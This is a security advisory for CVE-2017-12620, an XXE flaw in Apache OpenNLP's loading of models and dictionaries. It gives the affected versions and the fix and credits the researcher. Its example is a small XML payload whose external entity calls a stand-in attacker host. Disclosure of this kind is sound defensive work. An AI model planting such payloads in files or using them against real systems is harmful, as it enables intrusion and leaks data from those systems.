CVE-2017-12620 - Apache OpenNLP XXE vulnerability

Severity: Medium

Vendor: The Apache Software Foundation

Versions Affected:

OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1

Description: When loading models or dictionaries that contain XML it is possible to perform an XXE attack, since OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources.

Mitigation: All users who load models or XML dictionaries from untrusted sources should update to 1.8.2.

Example:

An attacker can place this:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>

Inside one of the XML files, either a dictionary or embedded inside a model package, to demonstrate this vulnerability.

Credit: This issue was discovered by Nishil Shah of Salesforce.

--The Apache OpenNLP Team

02 October 2017